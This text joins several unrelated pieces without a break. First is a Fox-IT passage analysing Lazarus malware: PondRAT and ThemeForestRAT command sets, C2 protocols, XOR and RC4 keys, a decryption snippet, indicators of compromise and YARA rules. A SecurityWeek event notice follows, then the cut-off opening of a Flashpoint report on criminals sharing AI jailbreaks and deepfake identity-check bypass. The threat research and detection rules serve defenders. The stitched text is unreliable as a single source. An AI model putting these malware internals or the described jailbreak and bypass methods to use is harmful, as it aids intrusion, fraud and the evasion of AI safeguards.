        a = xor_key[(idx + 5) & 0xF]
        b = xor_key[(idx - 3) & 0xF]
        c = xor_key[(idx - 7) & 0xF]
        xor_byte = a ^ b ^ c
        buf[idx] ^= xor_byte
        xor_key[idx & 0xF] = xor_byte
 
    return bytes(buf)

Listing 1: Python implementation of the XOR cipher used by PerfhLoader

The decrypted content contains a DLL that PerfhLoader loads into memory using the Manual-DLL-Loader project11. Interestingly, PondRAT uses this same project for DLL loading.

Discovery

After establishing a foothold, the actor deployed various tools in combination with the RATs described earlier. These included both custom tooling and publicly available tools. Table 1 lists some of the tools we recovered that the actor used.

ToolTool OriginDescription
ScreenshotterActorA tool that takes periodic screenshots and stores them locally
KeyloggerActorA Windows keylogger that writes user keystrokes to a file
Chromium browser dumperActorA browser dump tool that dumps Chromium-based browser cookies and credentials
MidProxyActorProxy tool
Mimikatz12PublicWindows secrets dumper
Proxy Mini13PublicProxy tool
frpc14PublicFast reverse proxy client
Table 1: Tools observed during incident response case (public and actor-developed)

Interestingly, the Fast Reverse Proxy client we found was the same client found in the 3CX compromise by Mandiant15. This client is version 0.32.116 and is from 2020, which is remarkable. We also found traces of a Themida-packed version of Quasar17, a malware family we did not see this Lazarus subgroup use before.

The actor used PondRAT in combination with ThemeForestRAT for roughly three months, to afterwards clean up and install the more sophisticated RAT called RemotePE. We will now discuss these three RATs.

PondRAT

PondRAT is a simple RAT, which its authors seem to refer to as β€œfirstloader”, based on the compilation metadata string objc_firstloader that is present in the macOS samples.

In our case, PondRAT was the initial access payload used to deploy other types of malware, including ThemeForestRAT. Judging from network data, apart from ThemeForestRAT activity, we observed significant activity to the PondRAT C2 server, indicating it was not just used for its loader functionality. In the incident response case from 2020 we encountered POOLRAT in combination with ThemeForestRAT. This could indicate that PondRAT is a successor of POOLRAT.

Overview

PondRAT is a straightforward RAT that allows an operator to read and write files, start processes and run shellcode. It has already been described by some vendors. As far as we know, the earliest sample is from 2021, referenced in a CISA article18. Based on PondRAT’s user-agent, we also noticed that PondRAT was used in an AppleJeus campaign Volexity wrote about19 (MSI file with hash 435c7b4fd5e1eaafcb5826a7e7c16a83). 360 Threat Intelligence Center wrote about PondRAT as well20, linking it to Lazarus and later writing about it being distributed through Python Package Index (PyPI) packages21. Vipyr Security wrote22 about malware that was dropped through malicious Python packages distributed through PyPI, which turned out to be PondRAT. Unit42 published an analysis23 of the RAT, referring to it as PondRAT and showing similarities between PondRAT and another RAT used by Lazarus: POOLRAT.

As described by Unit42, there are similarities between POOLRAT and PondRAT. There is overlap in function and class naming and both families check for successful responses in a similar way.

POOLRAT has more functionality than PondRAT. For example, POOLRAT has a configuration file for C2 servers, can timestomp24 files, can move files around, functionalities that PondRAT lacks. We think this is because there is no need for more functionality if its main function is to load other malware, allowing for a smaller code base and less maintenance.

Command and Control

PondRAT communicates over HTTP(S) with a hardcoded C2 server. Messages sent between the malware and the server are XOR-ed first and then Base64-encoded. For XORing it uses the hex-encoded key 774C71664D5D25775478607E74555462773E525E18237947355228337F433A3B.

Figure 4: PondRAT check-in request

Figure 4 contains an example check-in request to the C2 server. The tuid parameter contains the bot ID, control indicates the request type, and the payload parameter contains the encrypted check-in information. In this case, control is set to fconn, indicating it is a bot check-in, matching with the corresponding function name FConnectProxy(). When receiving a server reply starting with OK, PondRAT fetches a command from the server. For at least one Linux and macOS variant, the parameter names and string values consisted of scrambled letters, e.g. lkjyhnmiop instead of tuid and odlsjdfhw instead of fconn.

Commands

PondRAT has basic commands, such as reading and writing files and executing programs. Table 2 lists all commands and their names from the symbol data. When a bot command is executed, the response includes both the original command ID and a status code indicating either success (0x89A) or failure (0x89B).

Command ID / Status codeSymbol nameDescription
0x892csleepSleep
0x893MsgDownRead file
0x894MsgUpWrite file
0x895Ping
0x896Load PE from C2 in memory
0x897MsgRunLaunch process
0x898MsgCmdExecute command through the shell
0x899Exit
0x89aStatus code indicating command succeeded
0x89bStatus code indicating command failed
0x89cRun shellcode in process
Table 2: PondRAT command IDs and their descriptions

Windows

Only the Windows samples we analysed had support for commands 0x896 and 0x89C. The DLL loading functionality seems to be based on the open-source project β€œManual-DLL-Loader”25. As a sidenote, we analysed another POOLRAT Windows sample that used the β€œSimplePELoader” project26.

POOLRAT’s Little Brother

As mentioned by Palo Alto’s Unit42, PondRAT has similarities with POOLRAT. There is overlap in XOR keys, function naming and class naming. However, there are more similarities. Firstly, the Windows versions of PondRAT and POOLRAT use the format string %sd.e%sc "%s > %s 2>&1" for launching a shell command. Format strings have been discussed in the past27 and this specific format string was linked to Operation Blockbuster Sequel. Furthermore, PondRAT has a peculiar way of generating its bot ID, see the decompiled code below.

Figure 5: Bot ID generation for PondRAT (left) and POOLRAT (right)

Figure 5 shows how PondRAT and POOLRAT compute their bot ID. For PondRAT, tuid is the bot ID. It computes two parts of a 32-bit integer, that are split in two based on the bit_shift variable. Some of the POOLRAT samples compute the bot ID in a similar manner. The sample 6f2f61783a4a59449db4ba37211fa331 has symbol information available and contains a function named GenerateSessionId() that has this same logic.

More similarities can be found as part of the C2 protocol. PondRAT provides feedback to commands issued by the C2 server by returning the command ID concatenated with the status code. POOLRAT uses the same concept, see Figure 6.

Figure 6: Command status concatenation for PondRAT (left) and POOLRAT (right)

Another similarity can be found when comparing the Windows versions of POOLRAT and PondRAT. When running a Shell command (command ID 0x898) with PondRAT, the Windows version creates a temporary file with the prefix TLT in which it saves the command output. Then, it reads the file and sends the contents back to the C2 server and subsequently removes it. However, the way it removes the temporary file is remarkable.

It generates a buffer with random bytes and overwrites the file contents with it. Then, it renames the file 27 times, replacing all letters with only A’s, then B’s, etc. and with the last iteration renames all letters with random uppercase letters. For instance, when the file C:\Windows\Temp\tlt1bd8.tmp is deleted, it would first be renamed to C:\Windows\Temp\AAAAAAA.AAA, then to C:\Windows\Temp\BBBBBBB.BBB, and lastly to something like VYLDVAP.XQA. POOLRAT’s Windows version has the same functionality, see Figure 7.

Figure 7: Windows file name generation for PondRAT (left) and POOLRAT (right)

These similarities show that apart from variable data and symbol names, PondRAT is similar to POOLRAT in coding concepts as well. This further strengthens the connection between the two.

Summary

PondRAT is a simple RAT. Judging from the symbol data of macOS samples, its authors seem to refer to the malware as firstloader, a RAT that targets all three major operating systems. In our case, we observed it in combination with social engineering campaigns, whereas others have seen PondRAT being dropped through malicious software packages. Despite being simple in nature, it seems to do the job, given the frequency in which it is used. Judging from past incidents we investigated, PondRAT is a successor of POOLRAT.

Run, ThemeForest, Run!

In two incident response cases we found traces of a different RAT being used in conjunction with POOLRAT or PondRAT. We named it ThemeForestRAT, based on the substring ThemeForest which it uses in its C2 protocol. It is written in C++ and contains class names such as CServer, CJobManager, CSocketEx, CZipper and CUsbMan. ThemeForestRAT has more functionalities compared to PondRAT and POOLRAT.

In an earlier incident response case in 2020, we observed ThemeForestRAT in combination with POOLRAT. In the case from 2024, we observed it together with PondRAT. Its continued activity over at least five years demonstrates that ThemeForestRAT remains a relevant and capable tool for this actor. Besides Windows, we have observed Linux and macOS versions of the malware.

We believe that on Windows, this RAT is injected and executed in memory only, for example via PondRAT, or a dedicated loader, and is used as stealthier second-stage RAT with more functionality. The fact there are no direct samples of ThemeForestRAT on VirusTotal indicates it is quite successful in staying under the radar.

Overview

On startup, ThemeForestRAT attempts to read the configuration file from disk. When absent, it generates a unique bot ID and uses the hardcoded C2 configuration settings in the binary to create the configuration file.

Interestingly, the Windows variant creates two Windows events and accompanying threads that are used for signalling purposes (see Figure 8). However, the first thread related to the class CUsbMan only creates the temporary directory Z802056 and returns, this turned out to be legacy code as we will describe later.

The second thread monitors for new Remote Desktop (RDP) sessions and notifies the main thread when one is detected. Additionally, the thread checks for new physical console sessions and can optionally spawn extra commands under this session if this is enabled in the configuration.

Figure 8: ThemeForestRAT startup code creating two Windows events and threads for signalling

After creating these two threads it hibernates before connecting to the C2 server. The default hibernation period is three minutes but when it runs for the first time it checks in immediately. There are two cases where ThemeForestRAT wakes up from hibernation, either the hibernation period has passed, or one of the two events is signalled.

When it wakes up from hibernation it randomly selects a C2 server from its list and attempts to establish a connection. Upon receiving a response:OK acknowledgment, it downloads a 4-byte file that must decrypt to the 32-bit constant 0x20191127 to establish a valid C2 session. If this fails it will retry a different C2 and start over again, when the list of servers is exhausted it will go back into hibernation and try again later.

If it succeeds in establishing a C2 session, ThemeForestRAT sends basic system information including its wake-up reason to the C2 server, and the operator can now interact with the RAT as it keeps polling for new commands. When the operator sends an OnTerminate or OnSleep command (see Table 4), the C2 session ends, and the RAT goes back to hibernation.

struct SystemInfoWindows   // sizeof=0x478
{
    uint32  job_id;        // 0x10005 = Windows
    wchar   bot_id[20];
    wchar   hostname[64];
    wchar   whoami[50];
    uint32  dwMajorVersion;
    uint32  dwMinorVersion;
    uint32  dwPlatformId;
    uint16  padding1;
    wchar   ip_address[20];
    wchar   timezone[50];
    wchar   gpu[50];
    wchar   memory[50];
    uint16  padding2;
    uint32  wakeup_reason; // 0 = hibernation, 1 = USB, 2 = RDP
    wchar   os_version[256];
};

struct SystemInfoPOSIX     // sizeof=0x478
{
    uint32  job_id;        // 0x20005 = POSIX
    char    bot_id[16];
    char    unused1[24];
    char    hostname[128];
    char    username[114];
    char    ip_address[40];
    char    timezone[100];
    char    arch[100];
    char    memory[100];
    char    unused2[6];
    char    os_version[512];
};

Listing 2: ThemeForestRAT system information structure that is sent after establishing a C2 session

Listing 2 shows the structure definitions that ThemeForestRAT uses for sending system information when establishing a C2 session. The job_id field indicates the OS type, 0x10005 for Windows, and 0x20005 for both Linux and macOS as they share the same structure.

Configuration

The configuration file of ThemeForestRAT is encrypted with RC4 using the hex-encoded key 201A192D838F4853E300 and contains the following settings:

  • 64-bit unique bot ID
  • List of ten C2 server URLs
  • Command interpreter, for example cmd.exe (not used)
  • List of optional commands to execute under the user of the active console session (Windows only, empty by default)
  • Matching array to enable the optional console command
  • Last check-in timestamp
  • Hibernation time between C2 sessions in minutes, default value is 3
  • C2 callback settings, for example to immediately check in on a new active RDP connection

The configuration can be parsed using the C structure definition from Listing 3.

struct ThemeForestC2Config
{
    uint64  bot_id;
    wchar   urls[10][1024];
    wchar   shell[1024];
    wchar   wts_console_cmdline[10][1024];
    char    wts_console_cmdline_enabled[10];
    uint32  last_checkin_epoch;
    uint32  configured_hibernate_minutes;
    uint32  active_hibernate_minutes;
    uint16  callback_settings;
};

Listing 3: ThemeForestRAT configuration structure definition for Windows

The configuration path that the RAT reads from disk is hardcoded. On macOS and Linux, this is an absolute path, while on Windows it looks in the current working directory where the RAT is launched. In Table 3 we list the observed configuration paths and hardcoded configuration file sizes for ThemeForestRAT.

Operating systemThemeForestRAT configuration file on diskFile size
Windowsnetraid.inf43048 bytes
Linux/var/crash/cups43044 bytes
macOS/private/etc/imap43044 bytes
Table 3: Observed ThemeForestRAT configuration paths and their file sizes on Windows, Linux and macOS

Command and Control

ThemeForestRAT communicates over HTTP(S). The filenames it uses for retrieving commands from the C2 server are prefixed with ThemeForest_. The response data is sent back to the operator as a file prefixed with Thumb_, see Figure 6. On Windows it uses the Ryeol Http Client28 library for HTTP communications, and on macOS and Linux it uses libcurl. ThemeForestRAT has a single hardcoded C2 in the binary, but its configuration can be updated by sending the SetInfo command.

Figure 9: ThemeForestRAT sending encrypted system information to C2 server on initial check-in

Commands

In terms of command functionality, ThemeForestRAT supports over twenty commands, at least twice as much as PondRAT. The Linux and macOS versions contain debug symbols, which allows us to map the command IDs to function names where available.

Symbol nameCommand IDDescription
ListDrives0x10001000Get list of drives
CServer::OnFileBrowse0x10001001Get directory listing
CServer::OnFileCopy0x10001002Copy file from source to destination on victim machine
CServer::OnFileDelete0x10001003Delete a file
FileDeleteSecure0x10001004Delete a file securely
CServer::OnFileUpload0x10001005Open a file for writing on victim machine
CServer::FileDownload0x10001006Download file from victim machine
Run0x10001007Execute a command and return the exit code
CServer::OnChfTime0x10001008Timestomp file based on another file on disk
–0x10001009–
CServer::OnTestConn0x1000100aTest TCP connection to host and port
CServer::OnCmdRun0x1000100bRun command in background and return output
CServer::OnSleep0x1000100cHibernate for X seconds, this will also be saved in the configuration file
CServer::OnViewProcess0x1000100dGet process listing
CServer::OnKillProcess0x1000100eKill process by process ID
–0x1000100f–
CServer::OnFileProperty0x10001010Get file properties
CServer::OnGetInfo0x10001011Get current RAT configuration
CServer::OnSetInfo0x10001012Update and save RAT configuration file
CServer::OnZipDownload0x10001013Download a directory or file as a compressed Zip file
CServer::OnTerminate0x10001014Flush configuration to disk and hibernate until next wake up
(Data)0x10001015Data
(JobSuccess)0x10001016Job succeeded
(JobFailed)0x10001017Job failed
GetServiceName0x10001018Return current service name
CleanupAndExit0x10001019Remove persistence, configuration file, and terminate RAT
RecvMsg0x1000101aForce C2 check-in
RunAs0x1000101bSpawn a process under the user token of given Windows Terminal Services session
–0x1000101c–
WriteRandomData0x1000101dWrite random data to file handle
CServer::OnInjectShellcode0x1000101eInject shellcode into process ID
Table 4: ThemeForestRAT command IDs and their descriptions

Note that the symbol names in Table 4 that start with CServer:: are from the debug symbols and the other names are deduced based on analysis of the command.

Shellcode Injection

On Windows, the CServer::OnInjectShellcode command injects shellcode into a given process ID using NtOpenProcess, NtAllocateVirtualMemory, NtWriteVirtualMemory and RtlCreateUserThread Windows API calls. The shellcode is encrypted using the same algorithm used in PerfhLoader (see Listing 1). In the macOS and Linux samples we have analysed, this command is defined as an empty stub.

RomeoGolf’s Little Brother

In 2016, Novetta released a detailed report called Operation Blockbuster29, in which a Novetta-led coalition of security companies analysed malware samples from multiple cybersecurity incidents. The investigation linked the 2014 Sony Pictures attack to the Lazarus Group and revealed that the same actor had been behind numerous other attacks against government, military, and commercial targets using related malware since 2009.

Operation Blockbuster’s malware report describes RomeoGolf, a RAT that resembles ThemeForestRAT in several ways:

  • Uses the temporary folder Z802056, although not used in ThemeForestRAT, is still created
  • Overlapping command IDs and functionality
  • Same unique identifier generation using 4 calls to rand()
  • Configuration file with extension *.inf on Windows
  • Timestomping of the configuration file based on mspaint.exe
  • Two signalling threads for USB and RDP events

Figure 10 shows the RomeoGolf startup logic for generating its bot ID and two signalling threads that is identical to ThemeForestRAT (see Figure 5).

Figure 10: RomeoGolf startup creates two signalling threads, comparable to ThemeForestRAT (see Figure 5).

As can be seen in Table 5, the functionality to detect and copy data from newly attached logical drives has been removed in ThemeForestRAT, while leaving the temporary directory creation intact. Also, the thread to check for new RDP sessions has been extended in ThemeForestRAT to optionally spawn up to ten extra configured commands under the user of the active physical console session.

RomeoGolfThemeForestRAT
Compilation dateFri Oct 11 01:20:48 2013Thu Sep 07 06:40:40 2023
Known configuration filecrkdf32.infnetraid.inf
Configuration file timestomped tomspaint.exemspaint.exe
USB thread logic1. Creates %TEMP%\Z802056
2. Checks for newly attached drives and copies data to above folder
3. Signal on newly attached drives
1. Creates %TEMP%\Z802056
RDP thread logic1. Signal on new active RDP sessions
1. Start configured commands under the user of the new active console session
2. Signal on new active RDP session if configured
C2 communicationFake TLSHTTP(S)
Highest known command id0x100010130x1000101e
Table 5: Differences and similarities between RomeoGolf and ThemeForestRAT

While RomeoGolf used Fake TLS30 and its own custom server for its C2 communications, ThemeForestRAT uses the HTTP protocol and shared hosting for its C2 servers.

Onto the next stage with RemotePE

In the 2024 incident response case, we observed the actor cleaning up PondRAT and ThemeForestRAT, to deploy a more advanced RAT, which we named RemotePE. RemotePE is retrieved from a C2 server by RemotePELoader. RemotePELoader is encrypted on disk using Window’s Data Protection API (DPAPI) and is loaded by DPAPILoader. Using DPAPI enables environmental keying and makes it difficult to recover the original payload without access to the machine. DPAPILoader was made persistent through a created Windows service.

Figure 10: RemotePELoader check-in request to retrieve RemotePE payload

In Figure 10, we show a RemotePELoader check-in request used to retrieve RemotePE from the C2 server. RemotePE is written in C++ and is more advanced and elegant. We think that the actor uses this more sophisticated RAT for interesting or high-value targets that require a higher degree of operational security. Interestingly, it too uses the file renaming strategy PondRAT and POOLRAT Windows samples implement, except it skips the last random iteration.

We will publish a more thorough analysis of RemotePE in a future blogpost.

Summary

This blog is about a Lazarus subgroup that we have encountered multiple times during incident response engagements. This is a capable, patient, financially motivated actor who remains a legitimate threat.

We first discussed an incident response case from 2024, where this actor impersonated employees of trading companies to establish contact with potential victims. Though the method of achieving initial access remains unknown, we suspect a Chrome zero-day was used.

After initial access, two RATs were used in combination: PondRAT and ThemeForestRAT. Though PondRAT has already been discussed, there are no public analyses of ThemeForestRAT at the time of writing. For persistence, phantom DLL loading was used in conjunction with a custom loader called PerfhLoader.

PondRAT is a primitive RAT that provides little flexibility, however, as an initial payload it achieves its purpose. It has similarities with POOLRAT/SimpleTea. For more complex tasks, the actor uses ThemeForestRAT, which has more functionality and stays under the radar as it is loaded into memory only.

Lastly, we found the actor replaced ThemeForestRAT and PondRAT with the more advanced RemotePE. A detailed analysis of RemotePE will be published in the near future. So, stay tuned!

In Table 6 and 7, we list indicators of compromise related to the incident response cases we investigated and other artifacts we link to this actor.

Incident Response Support

If you have any questions or need assistance based on these findings, please contact Fox-IT CERT at cert@fox-it.com. For urgent matters, call 0800-FOXCERT (0800-3692378) within the Netherlands, or +31152847999 internationally to reach one of our incident responders.

Indicators of Compromise

TypeIndicatorComment
net.domaincalendly[.]liveFake calendly.com
net.domainpicktime[.]liveFake picktime.com
net.domainoncehub[.]coFake oncehub.com
net.domaingo.oncehub[.]coFake oncehub.com
net.domaindpkgrepo[.]comPotentially related to Chrome exploitation
net.domainpypilibrary[.]comUnknown, visited by msiexec.exe shortly after dpkgrepo[.]com
net.domainpypistorage[.]comUnknown, connection seen under SessionEnv service
net.domainkeondigital[.]comLPEClient server, connection seen under SessionEnv service
net.domainarcashop[.]orgPondRAT C2
net.domainjdkgradle[.]comPondRAT C2
net.domainlatamics[.]orgPondRAT C2
net.domainlmaxtrd[.]comThemeForestRAT C2
net.domainpaxosfuture[.]comThemeForestRAT C2
net.domainwww[.]plexisco[.]comThemeForestRAT C2
net.domainftxstock[.]comThemeForestRAT C2
net.domainwww[.]natefi[.]orgThemeForestRAT C2
net.domainnansenpro[.]comThemeForestRAT C2
net.domainaes-secure[.]netRemotePE payload delivery and C2
net.domainazureglobalaccelerator[.]comRemotePE payload delivery and C2
net.domainazuredeploypackages[.]netUnknown, connection seen via injected process
net.ip144.172.74[.]120Fast Reverse Proxy server
net.ip192.52.166[.]253Used as parameter for Quasar
file.path%TEMP%\tmpntl.datWindows keylogger output file path
file.pathC:\Windows\Temp\TMP01.datWindows keylogger error file path
file.namenetraid.infThemeForestRAT Windows configuration filename
file.path/var/crash/cupsThemeForestRAT Linux configuration file path
file.path/private/etc/imapThemeForestRAT macOS configuration file path
file.path/private/etc/krb5d.confPOOLRAT macOS configuration file path, CISA 2021 report
file.path/etc/apdl.cfPOOLRAT Linux configuration file path
file.path%SystemRoot%\system32\apdl.cfPOOLRAT Windows configuration file path
file.path/tmp/xweb_log.mdPOOLRAT, PondRAT Linux libcurl error log file path
file.nameperfh011.datEncrypted payload loaded by PerfhLoader
file.namehsu.datFilename actor used for SysInternals ADExplorer output
file.namepfu.datFilename actor used for SysInternals Handle viewer output
file.namefpc.datDropped Fast Reverse Proxy configuration filename
file.namefp.exeDropped Fast Reverse Proxy executable
file.nametsvipsrv.dllDLL phantom loaded by actor (SessionEnv)
file.namewlbsctrl.dllDLL phantom loaded by actor (IKEEXT)
file.nameadepfx.exeFilename actor used for legitimate SysInternals ADExplorer
file.namehd.exeFilename actor used for legitimate SysInternals Nthandle.exe
file.namemsnprt.exeFilename actor uses for Proxymini, open-source socks proxy
file.path%LocalAppData%\IconCache.logOutput path for custom browser credentials and cookies dumper based on Mimikatz
file.path/private/etc/pdpastemacOS keylogger file path
file.path/private/etc/xmemmacOS keylogger output file path
file.path/private/etc/tls3macOS screenshotter output directory
file.path%LocalAppData%\Microsoft\Software\CacheWindows screenshotter output directory
file.pathc:\windows\system32\cmui.exeThemida-packed Quasar
Table 6: Indicators of Compromise linked to actor, without hashes
digest.sha256Comment
24d5dd3006c63d0f46fb33cbc1f576325d4e7e03e3201ff4a3c1ffa604f1b74aFast Reverse Proxy v0.32.1, also observed by Mandiant in the 3CX supply chain attack
4715e5522fc91a423a5fcad397b571c5654dc0c4202459fdca06841eba1ae9b3PerfhLoader
8c3c8f24dc0c1d165f14e5a622a1817af4336904a3aabeedee3095098192d91fPerfhLoader
f4d8e1a687e7f7336162d3caed9b25d9d3e6cfe75c89495f75a92ca87025374bPOOLRAT Windows
85045d9898d28c9cdc4ed0ca5d76eceb457d741c5ca84bb753dde1bea980b516POOLRAT Linux
5e40d106977017b1ed235419b1e59ff090e1f43ac57da1bb5d80d66ae53b1df8POOLRAT macOS (CISA 2021 report)
c66ba5c68ba12eaf045ed415dfa72ec5d7174970e91b45fda9ebb32e0a37784aThemeForestRAT Windows
ff32bc1c756d560d8a9815db458f438d63b1dcb7e9930ef5b8639a55fa7762c9ThemeForestRAT Linux
cc4c18fefb61ec5b3c69c31beaa07a4918e0b0184cb43447f672f62134eb402bThemeForestRAT macOS
6510d460395ca3643133817b40d9df4fa0d9dbe8e60b514fdc2d4e26b567dfbdPondRAT Windows
973f7939ea03fd2c9663dafc21bb968f56ed1b9a56b0284acf73c3ee141c053cPondRAT Linux
f0321c93c93fa162855f8ea4356628eef7f528449204f42fbfa002955a0ba528PondRAT macOS
4f6ae0110cf652264293df571d66955f7109e3424a070423b5e50edc3eb43874DPAPILoader
aa4a2d1215f864481994234f13ab485b95150161b4566c180419d93dda7ac039DPAPILoader
159471e1abc9adf6733af9d24781fbf27a776b81d182901c2e04e28f3fe2e6f3DPAPILoader
7a05188ab0129b0b4f38e2e7599c5c52149ce0131140db33feb251d926428d68RemotePELoader (decrypted from disk)
37f5afb9ed3761e73feb95daceb7a1fdbb13c8b5fc1a2ba22e0ef7994c7920efRemotePE
59a651dfce580d28d17b2f716878a8eff8d20152b364cf873111451a55b7224dWindows keylogger
3c8f5cc608e3a4a755fe1a2b099154153fb7a88e581f3b122777da399e698ccaWindows screenshotter
d998de6e40637188ccbb8ab4a27a1e76f392cb23df5a6a242ab9df8ee4ab3936macOS keylogger (getkey)
e4ce73b4dbbd360a17f482abcae2d479bc95ea546d67ec257785fa51872b2e3fmacOS screenshotter (getscreen)
1a051e4a3b62cd2d4f175fb443f5172da0b40af27c5d1ffae21fde13536dd3e1macOS clipboard logger (pdpaste)
9dddf5a1d32e3ba7cc27f1006a843bfd4bc34fa8a149bcc522f27bda8e95db14Proxymini tool, opensource SOCKS proxy tool
2c164237de4d5904a66c71843529e37cea5418cdcbc993278329806d97a336a5Themida-packed Quasar
Table 7: SHA256 hashes of tools used by the actor

YARA rules

import "pe"

rule Lazarus_DPAPILoader_Hunting {
  meta:
    description = "Hunting rule to detect DPAPILoader, a loader used to load RemotePE."
    author      = "Fox-IT / NCC Group"

  strings:
    $msg_1 = "[!] Could not allocate memory at the desired base!\n"
    $msg_2 = "[!] Virtual section size is out ouf bounds: "
    $msg_3 = "[!] Invalid relocDir pointer\n"
    $msg_4 = "[-] Not supported relocations format at %d: %d\n"
    $msg_5 = "[!] Cannot fill imports into 32 bit PE via 64 bit loader!\n"

  condition:
    any of them and pe.imports("Crypt32.dll", "CryptUnprotectData")
}

rule Lazarus_RemotePE_C2_strings {
  meta:
    description = "RemotePE strings used for C2."
    author      = "Fox-IT / NCC Group"

  strings:
    $a = "MicrosoftApplicationsTelemetryDeviceId" wide ascii xor
    $b = "armAuthorization" wide ascii xor
    $c = "ai_session" wide ascii xor

  condition:
    uint16(0) == 0x5A4D and all of them
}

rule Lazarus_RemotePE_class_strings {
  meta:
    description = "RemotePE class strings."
    author      = "Fox-IT / NCC Group"

  strings:
    $a = "IMiddleController" ascii wide xor
    $b = "IChannelController" ascii wide xor
    $c = "IConfigProfile" ascii wide xor
    $d = "IKernelModule" ascii wide xor

  condition:
    all of them
}

rule Lazarus_PerfhLoader_XOR_key {
  meta:
    description = "XOR key used for shellcode obfuscation."
    author      = "Fox-IT / NCC Group"

  strings:
    $mov_1  = { C7 [1-3] 00 01 02 03 }
    $mov_2  = { C7 [1-3] 04 05 06 07 }
    $mov_3  = { C7 [1-3] 08 09 0A 0B }
    $mov_4  = { C7 [1-3] 0C 0D 0E 0F }
    $init_1 = { 41 8D ?? FD 41 8D ?? F9 }

  condition:
    all of them
}

rule Lazarus_ThemeForestRAT_C2_strings {
  meta:
    description = "ThemeForestRAT strings used for C2."
    author      = "Fox-IT / NCC Group"

  strings:
    $themeforest = "ThemeForest_%s" ascii wide
    $thumb       = "Thumb_%s" ascii wide
    $param_code  = "code" ascii wide
    $param_fn    = "fn" ascii wide
    $param_ldf   = "ldf" ascii wide

  condition:
    all of them
}

rule Lazarus_ThemeForestRAT_RC4_key {
  meta:
    description = "ThemeForest RC4 key used for config file."
    author      = "Fox-IT / NCC Group"

  strings:
    $rc4_key     = { 20 1A 19 2D 83 8F 48 53 E3 00 }
    $rc4_key_mov = { 20 1A 19 2D [2-8] 83 8F 48 53 [2-10] E3 00 }

  condition:
    any of them
}

References

Virtual Event Today: Threat Detection & Incident Response Summit

20 May 2026 at 12:00

Don't miss this virtual event as we explore how to cut through alert fatigue, leverage AI and unified platforms to accelerate investigations, and apply actionable threat intelligence.

The post Virtual Event Today: Threat Detection & Incident Response Summit appeared first on SecurityWeek.

AI Threat Report: How Artificial Intelligence Is Used Across Illicit Communities

Blogs

Blog

AI Threat Report: How Artificial Intelligence Is Used Across Illicit Communities

A monthly analysis of how artificial intelligence is used in illicit communities, based on Flashpoint proprietary intelligence and direct visibility into real threat actor environments.

SHARE THIS:

A finance employee joins a video call with their CFO and several colleagues. The request is routine. The faces match. The voices sound authentic. Minutes later, $25 million is transferredβ€”only to be discovered later that every participant on the call, except one, was AI-generated.

Techniques behind incidents like thisβ€”synthetic video, voice cloning, scripted interactionsβ€”are now being discussed openly in the same environments where threat actors exchange tools and methods. In April 2026 alone, Flashpoint analysts identified 2,328,958 posts discussing artificial intelligence in the context of illicit activity.

This volume reflects a larger shift: artificial intelligence is now deeply embedded across cybercrime ecosystems, influencing fraud, impersonation, social engineering, and access operations at scale. It shows up in how content is generated, how identities are replicated, and how workflows are executed and refined over time.

That’s why we created the monthly AI Threat Report to examine how threat actors are using artificial intelligence in real-world illicit environments. Drawing on Flashpoint proprietary intelligence and direct visibility into primary source communities across forums, marketplaces, and chat services, the report analyzes the tactics, tools, and operational patterns shaping malicious AI use. Analysis of April’s activity shows a focus on prompt-sharing, jailbreak methods, and alternative models that support fewer safeguards or moderation controls.

AI Activity Volume and What It Represents

In April 2026, Flashpoint analysts identified 2,328,958 posts discussing artificial intelligence in the context of illicit activity across forums, marketplaces, and chat services.

Mentions of AI in conjunction with illicit advertisements and discussions in April 2026. (Source: Flashpoint)

The underlying activity was concentrated around a familiar set of use cases and workflows:

  • identity verification bypass
  • fraud enablement and scripting
  • impersonation through synthetic media
  • prompt-sharing and jailbreak workflows

However, the emphasis within those discussions shifted in several places in April.

  • Posts tied to custom malicious LLM development appeared less frequently than discussions centered on usability: how to bypass safeguards, generate more reliable outputs, or move activity onto platforms perceived as less restrictive.Β 
  • References to alternative models and prompt collections appeared more often throughout the month, alongside requests for jailbreak methods and phishing-oriented outputs.

This activity points to a more mature stage of adoption. The focus is less on building entirely new tooling and more on improving reliability, portability, and ease of use within workflows that already exist.

That pattern shows up repeatedly across monitored sources. Users exchange prompts, repost working methods, and refine outputs through direct feedback. In many cases, the same underlying techniques continue circulating with only minor changes between platforms or communities.Looking across April activity helps identify which methods continue to generate demand, where threat actors are adapting around platform restrictions, and which workflows remain active across multiple environments.

Where AI Activity Is Concentrated

AI-related activity in April remained concentrated on a small number of platforms, though the distribution shifted noticeably compared to March.

Telegram accounted for the majority of observed activity, with 1,395,075 posts tied to AI services and discussions. Reddit, GitHub Gist, Pastebin, Discord, and smaller forums accounted for significantly lower volumes.

Posts selling AI services (in red) and posts seeking to purchase AI services (in blue) on Telegram in April 2026. (Source: Flashpoint)

The lower Telegram volume does not indicate reduced interest in AI-enabled activity. The platform continues to function as a primary distribution layer for prompts, jailbreak methods, fraud tooling, and service advertisements.

Across April, the same prompts, offers, and workflows appeared repeatedly across channels, often reposted with only minor adjustments. Sellers updated listings based on user feedback, while buyers requested revisions tied to specific outputs or platforms.

Other platforms served more targeted roles:

  • GitHub Gist and paste sites hosted scripts or supporting material
  • forums supported reputation building and longer technical discussions
  • Discord communities centered around specific models, prompt collections, or jailbreak workflows

The activity remains connected across environments. Methods introduced in one community frequently reappear elsewhere, particularly when they produce reliable outputs or help users work around moderation controls.Tracking how these discussions move between sources helps identify which workflows continue to gain traction and which techniques are becoming more broadly operationalized.

AI-Enabled Fraud and Identity Verification Bypass

Across April, Flashpoint analysts observed 63,763 posts advertising or discussing KYC bypass methods using artificial intelligence, including deepfake-enabled verification workflows.

The methods were active across Telegram channels dedicated to identity verification bypass services.

Posts continued to advertise:

  • synthetic video generation designed to mimic live verification behavior
  • voice cloning and scripted interaction prompts
  • bundled β€œKYC bypass kits” tailored to onboarding and verification workflows

Some offerings included guidance on how to adapt responses for specific platforms or verification requirements. Others promoted combinations of synthetic video, matching fake documentation, and AI-generated scripts designed to support impersonation attempts from start to finish.

The broader workflow remains consistent. AI supports how identities are replicated, how verification checks are navigated, and how fraud operations are scaled across different services.

This activity connects directly to the wider access ecosystem already observed across illicit communities. Stolen credentials, session tokens, phishing infrastructure, and AI-enabled impersonation methods increasingly operate alongside one another within the same workflows.

Across April, posts tied to these methods continued to show active refinement through user feedback, reposting, and platform-specific variations.

For security teams, this activity remains relevant at the control layer. Verification systems, onboarding workflows, and account recovery processes continue to be tested in the same environments where these methods are exchanged and improved.

Malicious LLM Usage and Prompt-Based Workflows

